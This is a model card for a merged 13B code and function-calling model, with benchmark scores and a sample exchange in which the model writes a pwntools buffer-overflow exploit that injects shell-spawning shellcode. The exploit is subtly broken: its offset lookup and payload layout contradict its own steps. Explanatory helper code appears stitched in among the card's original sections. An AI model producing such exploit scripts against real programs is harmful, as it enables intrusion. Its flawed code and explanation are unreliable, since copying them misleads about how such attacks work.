Winged-Lagomorph-2x13B / README.md

lodrick-the-lafted

Adding Evaluation Results

cccac5d verified 9 months ago


	---
	license: llama2
	tags:
	- moe
	- merge
	base_model: codellama/CodeLlama-13b-Instruct-hf
	model-index:
	- name: Winged-Lagomorph-2x13B
	  results:
	  - task:
	      type: text-generation
	      name: Text Generation
	    dataset:
	      name: AI2 Reasoning Challenge (25-Shot)
	      type: ai2_arc
	      config: ARC-Challenge
	      split: test
	      args:
	        num_few_shot: 25
	    metrics:
	    - type: acc_norm
	      value: 47.95
	      name: normalized accuracy
	    source:
	      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	      name: Open LLM Leaderboard
	  - task:
	      type: text-generation
	      name: Text Generation
	    dataset:
	      name: HellaSwag (10-Shot)
	      type: hellaswag
	      split: validation
	      args:
	        num_few_shot: 10
	    metrics:
	    - type: acc_norm
	      value: 69.39
	      name: normalized accuracy
	    source:
	      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	      name: Open LLM Leaderboard
	  - task:
	      type: text-generation
	      name: Text Generation
	    dataset:
	      name: MMLU (5-Shot)
	      type: cais/mmlu
	      config: all
	      split: test
	      args:
	        num_few_shot: 5
	    metrics:
	    - type: acc
	      value: 44.5
	      name: accuracy
	    source:
	      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	      name: Open LLM Leaderboard
	  - task:
	      type: text-generation
	      name: Text Generation
	    dataset:
	      name: TruthfulQA (0-shot)
	      type: truthful_qa
	      config: multiple_choice
	      split: validation
	      args:
	        num_few_shot: 0
	    metrics:
	    - type: mc2
	      value: 44.54
	    source:
	      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	      name: Open LLM Leaderboard
	  - task:
	      type: text-generation
	      name: Text Generation
	    dataset:
	      name: Winogrande (5-shot)
	      type: winogrande
	      config: winogrande_xl
	      split: validation
	      args:
	        num_few_shot: 5
	    metrics:
	    - type: acc
	      value: 67.4
	      name: accuracy
	    source:
	      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	      name: Open LLM Leaderboard
	  - task:
	      type: text-generation
	      name: Text Generation
	    dataset:
	      name: GSM8k (5-shot)
	      type: gsm8k
	      config: main
	      split: test
	      args:
	        num_few_shot: 5
	    metrics:
	    - type: acc
	      value: 25.63
	      name: accuracy
	    source:
	      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
	      name: Open LLM Leaderboard
	---

	Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo prompt template for regular code and the NexusRaven (NR) prompt template for function calling.
	<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png>
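
A minimal sketch of assembling a prompt in the `SYSTEM:` / `USER:` / `ASSISTANT:` layout that the sample in this README uses. The helper name `build_prompt` is hypothetical, and the exact whitespace between the sections is an assumption inferred from that sample, not a documented specification.

```python
def build_prompt(system: str, user: str) -> str:
    """Assemble a SYSTEM/USER/ASSISTANT prompt string.

    Assumption: a blank line separates the system block from the user turn,
    and the prompt ends with a bare "ASSISTANT:" for the model to complete.
    """
    return f"SYSTEM: {system.strip()}\n\nUSER: {user.strip()}\nASSISTANT:"


if __name__ == "__main__":
    print(build_prompt(
        "Answer the Question by exploring multiple reasoning paths.",
        "Write a function that reverses a string.",
    ))
```

The resulting string can be tokenized and passed to whatever generation API is in use; function-calling prompts for the NexusRaven side follow a different template and are not covered by this sketch.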

	SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
	- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
	- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
	- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
	- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
	- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
	- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
	- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
	- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
	In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.

	USER: Write a pwntools script that overflows a 64 character buffer from stdin.
	ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:

	1. Identify the vulnerable program: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
	2. Set up the environment: Install pwntools and any other necessary dependencies.
	3. Create a pwntools script: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
	4. Find the offset: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
	5. Overflow the buffer: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
	6. Control the execution flow: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
	7. Execute the script: Run the script and observe the results.

	Here's an example pwntools script that overflows a 64-character buffer:

	```python
	from pwn import *

	# Set up the connection to the vulnerable program
	p = process('./vulnerable_program')

	# Find the offset using cyclic
	offset = cyclic_find(b'A'*64)

	# Generate shellcode
	shellcode = asm(shellcraft.sh())

	# Overflow the buffer
	payload = b'A' * offset + shellcode
	p.sendline(payload)

	# Execute the script
	p.interactive()
	```

	In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.

	Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
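
Step 4 of the sample output mentions finding the offset with a cyclic pattern. As a rough illustration of the idea, independent of pwntools, the sketch below generates a de Bruijn sequence in which every 4-byte window is unique, then looks up the position of a 4-byte chunk. The names `de_bruijn` and `find_offset`, and the 72-byte offset, are hypothetical choices for this example. In practice the chunk would be read from the overwritten return address in a crash dump rather than sliced from the pattern.

```python
from itertools import islice


def de_bruijn(alphabet: bytes, n: int):
    """Yield the de Bruijn sequence B(k, n) over `alphabet`, one byte value at a time."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def find_offset(pattern: bytes, chunk: bytes) -> int:
    """Return the index of `chunk` in `pattern`, or -1 if it is absent."""
    return pattern.find(chunk)


# Build a 128-byte pattern in which every 4-byte window occurs only once.
pattern = bytes(islice(de_bruijn(b"abcdefghijklmnopqrstuvwxyz", 4), 128))

# Simulated crash: pretend these 4 bytes ended up in the return address.
observed = pattern[72:76]
offset = find_offset(pattern, observed)
print(offset)
```

Because each 4-byte window is unique, the lookup identifies how many bytes precede the overwritten value, which is the padding length a payload would need.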

	# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
	Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B).

	| Metric                          |Value|
	|---------------------------------|----:|
	|Avg.                             |49.90|
	|AI2 Reasoning Challenge (25-Shot)|47.95|
	|HellaSwag (10-Shot)              |69.39|
	|MMLU (5-Shot)                    |44.50|
	|TruthfulQA (0-shot)              |44.54|
	|Winogrande (5-shot)              |67.40|
	|GSM8k (5-shot)                   |25.63|
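
The `Avg.` row is consistent with an unweighted mean of the six benchmark scores. A quick check, assuming that is how the figure was computed (the variable names here are illustrative):

```python
# Scores copied from the results table above.
scores = {
    "AI2 Reasoning Challenge (25-Shot)": 47.95,
    "HellaSwag (10-Shot)": 69.39,
    "MMLU (5-Shot)": 44.50,
    "TruthfulQA (0-shot)": 44.54,
    "Winogrande (5-shot)": 67.40,
    "GSM8k (5-shot)": 25.63,
}

# Unweighted arithmetic mean across the six benchmarks.
average = sum(scores.values()) / len(scores)
print(f"{average:.2f}")
```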